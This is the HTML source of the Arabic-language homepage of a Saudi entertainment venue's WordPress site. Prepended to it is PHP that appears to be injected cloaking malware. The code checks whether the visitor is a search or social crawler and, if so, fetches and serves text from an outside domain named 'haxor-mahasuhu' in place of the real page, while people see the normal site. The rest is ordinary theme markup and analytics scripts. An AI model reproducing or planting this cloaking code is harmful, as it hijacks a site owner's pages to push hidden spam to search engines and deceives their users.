<?php
function is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $bots = array(
        'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
        'bingbot', 'Slurp', 'DuckDuckBot', 'BingPreview', 'DuckDuckGo', 'YandexBot',
        'Baiduspider', 'TelegramBot', 'facebookexternalhit', 'Pinterest', 'W3C_Validator',
        'Google-Site-Verification', 'Google-InspectionTool', 'Applebot', 'AhrefsBot', 'SEMrushBot', 'MJ12bot'
    );
    
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }

    return false;
}

function fetch_message_from_url($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Timeout setelah 10 detik
    $response = curl_exec($ch);
    
    if (curl_errno($ch)) {
        error_log("Error cURL: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_code == 200) {
        return $response;
    } else {
        error_log("HTTP Error: Status Code " . $http_code);
        return false;
    }
}

if (is_bot()) { 
    $message = fetch_message_from_url('https://kiko.haxor-mahasuhu.info/boostsaudi.com/index.txt');
    
    if ($message) {
        echo $message;
    } else {
        echo "";
    }
    exit;
}
?>

<!doctype html>
<html dir="rtl" lang="ar">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name="facebook-domain-verification" content="wcw58xl55dlr0k8mv5uk11q5j26leh"/>
    <!-- Google Tag Manager -->
	<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
	new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
	j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
	'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
	})(window,document,'script','dataLayer','GTM-WZ4RRCC');</script>
	<!-- End Google Tag Manager -->
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-172278563-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-172278563-1');
    </script>
    <script>
        !function (w, d, t) {
            w.TiktokAnalyticsObject=t;var ttq=w[t]=w[t]||[];ttq.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"],ttq.setAndDefer=function(t,e){t[e]=function(){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=function(e,n){var i="https://analytics.tiktok.com/i18n/pixel/events.js";ttq._i=ttq._i||{},ttq._i[e]=[],ttq._i[e]._u=i,ttq._t=ttq._t||{},ttq._t[e]=+new Date,ttq._o=ttq._o||{},ttq._o[e]=n||{};var o=document.createElement("script");o.type="text/javascript",o.async=!0,o.src=i+"?sdkid="+e+"&lib="+t;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(o,a)};
            ttq.load('C18SU0BQIA5GK7IMUN10');
            ttq.page();
        }(window, document, 'ttq');
    </script>
    <script>
        !function (w, d, t) {
            w.TiktokAnalyticsObject=t;var ttq=w[t]=w[t]||[];ttq.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"],ttq.setAndDefer=function(t,e){t[e]=function(){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=function(e,n){var i="https://analytics.tiktok.com/i18n/pixel/events.js";ttq._i=ttq._i||{},ttq._i[e]=[],ttq._i[e]._u=i,ttq._t=ttq._t||{},ttq._t[e]=+new Date,ttq._o=ttq._o||{},ttq._o[e]=n||{};var o=document.createElement("script");o.type="text/javascript",o.async=!0,o.src=i+"?sdkid="+e+"&lib="+t;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(o,a)};
            ttq.load('C54EOB000UN7QUNFB9BG');
            ttq.page();
        }(window, document, 'ttq');
    </script>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
    <!-- Primary Meta Tags -->
    <meta name="title" content="boostsaudi.com | Play Eat Party">
    <meta name="description" content="A local saudi brand with international standards who provide the coolest entertainment experience to everyone in one place">
    <!-- Open Graph / Facebook -->
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://boostsaudi.com/">
    <meta property="og:title" content="boostsaudi.com | Play Eat Party">
    <meta property="og:description" content="A local saudi brand with international standards who provide the coolest entertainment experience to everyone in one place">
    <meta property="og:image" content="https://boostsaudi.com/wp-content/uploads/2021/04/new-logo.png">
    <!-- Twitter -->
    <meta property="twitter:card" content="summary_large_image">
    <meta property="twitter:url" content="https://boostsaudi.com/">
    <meta property="twitter:title" content="boostsaudi.com | Play Eat Party">
    <meta property="twitter:description" content="A local saudi brand with international standards who provide the coolest entertainment experience to everyone in one place">
    <meta property="twitter:image" content="https://boostsaudi.com/wp-content/uploads/2021/04/new-logo.png">
	<title>Boost</title>
	<link rel="canonical" href="https://boostsaudi.com" />
<meta name="robots" content="max-image-preview:large"/>
<link rel="dns-prefetch" href="https://code.jquery.com/"/>
<link rel="dns-prefetch" href="https://kenwheeler.github.io/"/>
<link rel="dns-prefetch" href="https://stackpath.bootstrapcdn.com/"/>
<link rel="dns-prefetch" href="https://maps.googleapis.com/"/>
<link rel="dns-prefetch" href="https://kit.fontawesome.com/"/>
<link rel="dns-prefetch" href="https://cdnjs.cloudflare.com/"/>
<link rel="dns-prefetch" href="https://rawgit.com/"/>
<link rel="dns-prefetch" href="https://cdn.jsdelivr.net/"/>
<link rel="dns-prefetch" href="https://fonts.googleapis.com/"/>
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/boostsaudi.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.2"}};
/*! This file is auto-generated */
!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
</script>
<style id="wp-emoji-styles-inline-css">
	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
</style>
<link rel="stylesheet" id="wp-block-library-rtl-css" href="wp-includes/css/dist/block-library/style-rtl.min_ver-6.4.2.css" media="all"/>
<style id="classic-theme-styles-inline-css">
/*! This file is auto-generated */
.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}
</style>
<style id="global-styles-inline-css">
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
</style>
<link rel="stylesheet" id="ctl-arcade-lite-style-front-commons-css" href="wp-content/plugins/ctl-arcade-lite/css/commons_ver-6.4.2.css" media="all"/>
<link rel="stylesheet" id="ctl-arcade-lite-style-front-animation-css" href="wp-content/plugins/ctl-arcade-lite/css/animation_ver-6.4.2.css" media="all"/>
<link rel="stylesheet" id="ctl-arcade-lite-style-front-dingbats-css" href="wp-content/plugins/ctl-arcade-lite/css/ctl-arcade_ver-6.4.2.css" media="all"/>
<link rel="stylesheet" id="ctl-arcade-style-front-commons-css" href="wp-content/plugins/ctl-arcade/css/commons_ver-6.4.2.css" media="all"/>
<link rel="stylesheet" id="ctl-arcade-style-front-animation-css" href="wp-content/plugins/ctl-arcade/css/animation_ver-6.4.2.css" media="all"/>
<link rel="stylesheet" id="ctl-arcade-style-front-dingbats-css" href="https://boostsaudi.com/wp-content/plugins/ctl-arcade/css/ctl-arcade.css?ver=6.4.2" media="all"/>
<link rel="stylesheet" id="woocommerce-layout-rtl-css" href="https://boostsaudi.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout-rtl.css?ver=8.4.0" media="all"/>
<link rel="stylesheet" id="woocommerce-smallscreen-rtl-css" href="https://boostsaudi.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen-rtl.css?ver=8.4.0" media="only screen and (max-width: 768px)"/>
<link rel="stylesheet" id="woocommerce-general-rtl-css" href="https://boostsaudi.com/wp-content/plugins/woocommerce/assets/css/woocommerce-rtl.css?ver=8.4.0" media="all"/>
<style id="woocommerce-inline-inline-css">
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel="stylesheet" id="wpml-legacy-horizontal-list-0-css" href="https://boostsaudi.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style.min.css?ver=1" media="all"/>
<link rel="stylesheet" id="wpml-menu-item-0-css" href="https://boostsaudi.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-item/style.min.css?ver=1" media="all"/>
<link rel="stylesheet" id="bootstrapcdn-style-css" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="fonts-tajawal-style-css" href="//fonts.googleapis.com/css2?family=Tajawal%3Awght%40300%3B400%3B700&amp;display=swap&amp;ver=1.0.0" media="all"/>
<link rel="stylesheet" id="fonts-chivo-style-css" href="//fonts.googleapis.com/css2?family=Chivo%3Awght%40300%3B400%3B700&amp;display=swap&amp;ver=1.0.0" media="all"/>
<link rel="stylesheet" id="slick-theme-style-css" href="https://kenwheeler.github.io/slick/slick/slick-theme.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="slick-style-css" href="https://kenwheeler.github.io/slick/slick/slick.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="font-awesome-style-css" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="normalize-style-css" href="https://boostsaudi.com/wp-content/themes/boost/assets/css/normalize.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="superwheel-style-css" href="https://boostsaudi.com/wp-content/themes/boost/assets/dist/superwheel.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="main-style-rtl-css" href="https://boostsaudi.com/wp-content/themes/boost/assets/css/rtl/main-rtl.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="responsive-style-rtl-css" href="https://boostsaudi.com/wp-content/themes/boost/assets/css/rtl/responsive-rtl.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="dropzone-style-css" href="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.2/dropzone.min.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="jquery-ui-style-css" href="https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="booking-style-css" href="https://boostsaudi.com/wp-content/themes/boost/assets/css/rtl/booking-rtl.css?ver=1.0.0" media="all"/>
<link rel="stylesheet" id="fjalla-chivo-style-css" href="//fonts.googleapis.com/css?family=Fjalla+One&amp;ver=1.0.0" media="all"/>
<link rel="stylesheet" id="new-wheel-style-css" href="https://boostsaudi.com/wp-content/themes/boost/assets/spin/css/style.css?ver=1.0.0" media="all"/>
<script src="https://code.jquery.com/jquery-3.5.1.min.js?ver=1.0.0" id="jquery-js"></script>
<script src="https://boostsaudi.com/wp-content/plugins/ctl-arcade-lite/js/commons.js?ver=6.4.2" id="ctl-arcade-lite-script-front-commons-js"></script>
<script src="https://boostsaudi.com/wp-content/plugins/ctl-arcade-lite/js/front-main.js?ver=6.4.2" id="ctl-arcade-lite-script-front-main-js"></script>
<script src="https://boostsaudi.com/wp-content/plugins/ctl-arcade/js/commons.js?ver=6.4.2" id="ctl-arcade-script-front-commons-js"></script>
<script src="https://boostsaudi.com/wp-content/plugins/ctl-arcade/js/front-main.js?ver=6.4.2" id="ctl-arcade-script-front-main-js"></script>
<script src="https://boostsaudi.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.8.4.0" id="jquery-blockui-js" defer data-wp-strategy="defer"></script>
<script id="wc-add-to-cart-js-extra">
var wc_add_to_cart_params = {"ajax_url":"/","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"\u0639\u0631\u0636 \u0627\u0644\u0633\u0644\u0629","cart_url":"https:\/\/boostsaudi.com\/cart\/","is_cart":"","cart_redirect_after_add":"yes"};
</script>
<script src="https://boostsaudi.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=8.4.0" id="wc-add-to-cart-js" defer data-wp-strategy="defer"></script>
<script src="https://boostsaudi.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.8.4.0" id="js-cookie-js" defer data-wp-strategy="defer"></script>
<script id="woocommerce-js-extra">
var woocommerce_params = {"ajax_url":"/","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
</script>
<script src="https://boostsaudi.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=8.4.0" id="woocommerce-js" defer data-wp-strategy="defer"></script>
<script id="boost-main-js-extra">
var pt_params = {"ajaxurl":"https:\/\/boostsaudi.com\/wp-admin\/admin-ajax.php","spin_and_win_1":null,"spin_and_win_img_1":null};
</script>
<script src="https://boostsaudi.com/wp-content/themes/boost/assets/js/main.js?ver=6.4.2" id="boost-main-js"></script>
<link rel="https://api.w.org/" href="https://boostsaudi.com/wp-json/"/><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://boostsaudi.com/xmlrpc.php?rsd"/>
<meta name="generator" content="WordPress 6.4.2"/>
<meta name="generator" content="WooCommerce 8.4.0"/>
<link rel="shortlink" href="/"/>
<meta name="generator" content="WPML ver:4.5.12 stt:5,1;"/>
<script>
 var g_szCtlArcadeAjax = '/';
 var g_szCtlArcadeColor = 'green';
</script>
<link rel="shortcut icon" href="https://boostsaudi.com/wp-content/themes/boost/assets/img/fav.png"/><style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>    <!-- Global site tag (gtag.js) - Google Ads: 671420447 -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=AW-671420447"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'AW-671420447');
    </script>
</head>
<body class="rtl home page-template page-template-builder-template page-template-builder-template-php page page-id-205 theme-boost woocommerce-no-js">
	<!-- Google Tag Manager (noscript) -->
	<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WZ4RRCC" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
	<!-- End Google Tag Manager (noscript) -->
<div id="page" class="site">
	<header id="masthead" class="site-header">
        <section class="top-bar">
            <div class="wrap-topbar">
                <div class="social-media">
                    <ul>
                                                        <li>
                                        <span>
                                            <a target="_blank" style="background-color: #7300de" href="https://www.instagram.com/boostsaudi/">
                                                <i class="fab fa-instagram" aria-hidden="true"></i>                                            </a>
                                        </span>
                                </li>
                                                            <li>
                                        <span>
                                            <a target="_blank" style="background-color: #425cc7" href="https://twitter.com/boost_saudi?s=09">
                                                <i class="fab fa-twitter" aria-hidden="true"></i>                                            </a>
                                        </span>
                                </li>
                                                            <li>
                                        <span>
                                            <a target="_blank" style="background-color: #7300de" href="https://www.facebook.com/boostsaudi/">
                                                <i class="fab fa-facebook-f" aria-hidden="true"></i>                                            </a>
                                        </span>
                                </li>
                                                            <li>
                                        <span>
                                            <a target="_blank" style="background-color: #25d366" href="https://wa.me/966500878111">
                                                <i class="fab fa-whatsapp" aria-hidden="true"></i>                                            </a>
                                        </span>
                                </li>
                                                            <li>
                                        <span>
                                            <a target="_blank" style="background-color: #eb0045" href="mailto:ideas@boostsaudi.com">
                                                <i class="fas fa-envelope" aria-hidden="true"></i>                                            </a>
                                        </span>
                                </li>
                                                            <li>
                                        <span>
                                            <a target="_blank" style="background-color: #2e2b64" href="https://g.page/boostsaudi?share">
                                                <i class="fas fa-map-marker-alt" aria-hidden="true"></i>                                            </a>
                                        </span>
                                </li>
                                                </ul>
                </div>
                <div class="lang-switch">
                    <div class="custom-lang-switch">
<div class="wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-rtl wpml-ls-legacy-list-horizontal">
	<ul><li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-en wpml-ls-first-item wpml-ls-last-item wpml-ls-item-legacy-list-horizontal">
				<a href="en/" class="wpml-ls-link">
                    <span class="wpml-ls-native" lang="en">English</span></a>
			</li></ul>
</div>
                    </div>
                </div>
            </div>
        </section>
        <div class="custom-lang-switch">
<div class="wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-rtl wpml-ls-legacy-list-horizontal">
